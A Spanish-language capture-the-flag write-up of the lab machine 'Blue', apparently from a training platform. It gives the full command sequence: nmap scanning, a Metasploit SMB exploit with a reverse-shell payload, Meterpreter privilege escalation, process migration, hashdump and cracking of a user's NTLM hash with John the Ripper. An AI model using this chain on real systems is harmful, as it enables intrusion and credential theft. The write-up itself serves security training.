Blue

✍️ Autor: DarkStar7471, ben🔍 Dificultad: Fácil

🔍 RECONOCIMIENTO

En primer lugar, tras conectarnos a la máquina, utilizamos el comando:

ping -c 1 10.10.196.186

para verificar la conectividad de red.

A continuación, se realiza el comando:

nmap 10.10.196.186

para realizar un escaneo de puertos y servicios detallado en la dirección IP.

🔎 EXPLORACIÓN

Se utiliza el comando:

sudo nmap -sCV -p135,139,445,3389 -v 10.10.196.186

para obtener más información sobre esos puertos específicamente.

Miramos si es vulnerable el puerto 445.

🚀 EXPLOTACIÓN

set RHOSTS 10.10.196.186
set payload windows/x64/shell/reverse_tcp
run

🔐 PRIVILEGIOS

Después de explotar la máquina y acceder con Meterpreter, verificamos los privilegios:

meterpreter > getsystem
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Confirmamos el proceso en el que estamos inyectados:

meterpreter > getpid
Current pid: 1312

Listamos todos los procesos para revisar:

meterpreter > ps

Estamos dentro de spoolsv.exe, un proceso estable y de confianza en sistemas Windows. Si se reinicia, automáticamente vuelve a cargar, manteniéndonos dentro.

Si comenzamos con una shell básica, podemos convertirla a Meterpreter:

post/multi/manage/shell_to_meterpreter
use post/multi/manage/shell_to_meterpreter
show options
set SESSION <ID>
run

Después de convertir, seleccionamos la nueva sesión Meterpreter con sessions. Aunque tengamos privilegios de SYSTEM, es recomendable migrar a un proceso estable que también corra como SYSTEM.

meterpreter > ps
3048  TrustedInstaller.exe  NT AUTHORITY\SYSTEM
migrate 3048

Podemos abrir un shell del sistema para confirmarlo:

meterpreter > shell
C:\Windows\System32> whoami
nt authority\system
exit

Con privilegios de SYSTEM, volcamos los hashes:

meterpreter > hashdump
Administrator:500:...:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:...:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:...:ffb43f0de35be4d9917ac0cc8ad57f8d:::

Copiamos la línea del usuario Jon y crackeamos.

echo "Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::" > /tmp/jon_hash.txt
john /tmp/jon_hash.txt --format=NT --wordlist=/usr/share/wordlists/rockyou.txt

La contraseña del usuario Jon es alqfna22.

Last updated

Was this helpful?